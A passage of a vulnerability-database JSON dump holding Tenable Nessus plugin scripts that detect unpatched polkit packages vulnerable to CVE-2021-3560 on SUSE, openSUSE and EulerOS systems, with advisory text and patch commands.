polkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : polkit (SUSE-SU-2021:1842-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libpolkit0", "p-cpe:/a:novell:suse_linux:libpolkit0-debuginfo", "p-cpe:/a:novell:suse_linux:polkit", "p-cpe:/a:novell:suse_linux:polkit-debuginfo", "p-cpe:/a:novell:suse_linux:polkit-debugsource", "p-cpe:/a:novell:suse_linux:typelib-1_0-polkit", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2021-1842-1.NASL", "href": "https://www.tenable.com/plugins/nessus/150266", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2021:1842-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150266);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"SUSE SLES12 Security Update : polkit (SUSE-SU-2021:1842-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for polkit fixes the following issues :\n\nCVE-2021-3560: Fixed a local privilege escalation using\npolkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1186497\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3560/\");\n # https://www.suse.com/support/update/announcement/2021/suse-su-20211842-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?18b1c9ba\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud Crowbar 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-9-2021-1842=1\n\nSUSE OpenStack Cloud Crowbar 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2021-1842=1\n\nSUSE OpenStack Cloud 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-9-2021-1842=1\n\nSUSE OpenStack Cloud 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-8-2021-1842=1\n\nSUSE Linux Enterprise Workstation Extension 12-SP5 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP5-2021-1842=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP5-2021-1842=1\n\nSUSE Linux Enterprise Server for SAP 12-SP4 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP4-2021-1842=1\n\nSUSE Linux Enterprise Server for SAP 12-SP3 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP3-2021-1842=1\n\nSUSE Linux Enterprise Server 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP5-2021-1842=1\n\nSUSE Linux Enterprise Server 12-SP4-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP4-LTSS-2021-1842=1\n\nSUSE Linux Enterprise Server 12-SP3-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-2021-1842=1\n\nSUSE Linux Enterprise Server 12-SP3-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2021-1842=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2021-1842=1\n\nHPE Helion Openstack 8 :\n\nzypper in -t patch HPE-Helion-OpenStack-8-2021-1842=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpolkit0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpolkit0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-Polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4|5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4/5\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpolkit0-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpolkit0-debuginfo-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"polkit-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"polkit-debuginfo-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"polkit-debugsource-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"typelib-1_0-Polkit-1_0-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpolkit0-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpolkit0-debuginfo-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"polkit-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"polkit-debuginfo-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"polkit-debugsource-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-Polkit-1_0-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libpolkit0-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libpolkit0-debuginfo-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"polkit-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"polkit-debuginfo-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"polkit-debugsource-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"typelib-1_0-Polkit-1_0-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpolkit0-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpolkit0-debuginfo-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"polkit-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"polkit-debuginfo-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"polkit-debugsource-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"typelib-1_0-Polkit-1_0-0.113-5.21.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:52:31", "description": "This update for polkit fixes the following issues :\n\n - CVE-2021-3560: Fixed a local privilege escalation using polkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\nThis update was imported from the SUSE:SLE-15-SP2:Update update project.", "cvss3": {}, "published": "2021-06-07T00:00:00", "type": "nessus", "title": "openSUSE Security Update : polkit (openSUSE-2021-838)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libpolkit0", "p-cpe:/a:novell:opensuse:libpolkit0-32bit", "p-cpe:/a:novell:opensuse:libpolkit0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libpolkit0-debuginfo", "p-cpe:/a:novell:opensuse:polkit", "p-cpe:/a:novell:opensuse:polkit-debuginfo", "p-cpe:/a:novell:opensuse:polkit-debugsource", "p-cpe:/a:novell:opensuse:polkit-devel", "p-cpe:/a:novell:opensuse:polkit-devel-debuginfo", "p-cpe:/a:novell:opensuse:typelib-1_0-polkit-1_0", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-838.NASL", "href": "https://www.tenable.com/plugins/nessus/150319", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2021-838.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150319);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"openSUSE Security Update : polkit (openSUSE-2021-838)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for polkit fixes the following issues :\n\n - CVE-2021-3560: Fixed a local privilege escalation using\n polkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\nThis update was imported from the SUSE:SLE-15-SP2:Update update\nproject.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1186497\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected polkit packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpolkit0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpolkit0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpolkit0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpolkit0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:polkit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:polkit-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:polkit-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-Polkit-1_0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libpolkit0-0.116-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libpolkit0-debuginfo-0.116-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"polkit-0.116-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"polkit-debuginfo-0.116-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"polkit-debugsource-0.116-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"polkit-devel-0.116-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"polkit-devel-debuginfo-0.116-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"typelib-1_0-Polkit-1_0-0.116-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libpolkit0-32bit-0.116-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libpolkit0-32bit-debuginfo-0.116-lp152.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpolkit0 / libpolkit0-debuginfo / polkit / polkit-debuginfo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T15:21:26", "description": "According to the versions of the polkit packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-02-13T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.6.0 : polkit (EulerOS-SA-2022-1090)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:polkit", "p-cpe:/a:huawei:euleros:polkit-devel", "p-cpe:/a:huawei:euleros:polkit-docs", "p-cpe:/a:huawei:euleros:polkit-libs", "cpe:/o:huawei:euleros:uvp:3.0.6.0"], "id": "EULEROS_SA-2022-1090.NASL", "href": "https://www.tenable.com/plugins/nessus/158017", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158017);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"EulerOS Virtualization 3.0.6.0 : polkit (EulerOS-SA-2022-1090)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the polkit packages installed, the EulerOS Virtualization installation on the remote host\nis affected by the following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests,\n elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged\n local attacker to, for example, create a new local administrator. The highest threat from this\n vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1090\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1f4e817d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected polkit packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.6.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.6.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.6.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"polkit-0.115-2.h13.eulerosv2r8\",\n \"polkit-devel-0.115-2.h13.eulerosv2r8\",\n \"polkit-docs-0.115-2.h13.eulerosv2r8\",\n \"polkit-libs-0.115-2.h13.eulerosv2r8\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T15:02:52", "description": "According to the versions of the polkit packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-09-27T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : polkit (EulerOS-SA-2021-2537)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:polkit", "p-cpe:/a:huawei:euleros:polkit-libs", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-2537.NASL", "href": "https://www.tenable.com/plugins/nessus/153754", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153754);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"EulerOS 2.0 SP9 : polkit (EulerOS-SA-2021-2537)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the polkit packages installed, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests,\n elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged\n local attacker to, for example, create a new local administrator. The highest threat from this\n vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-2537\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c0c8ff0a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected polkit packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate 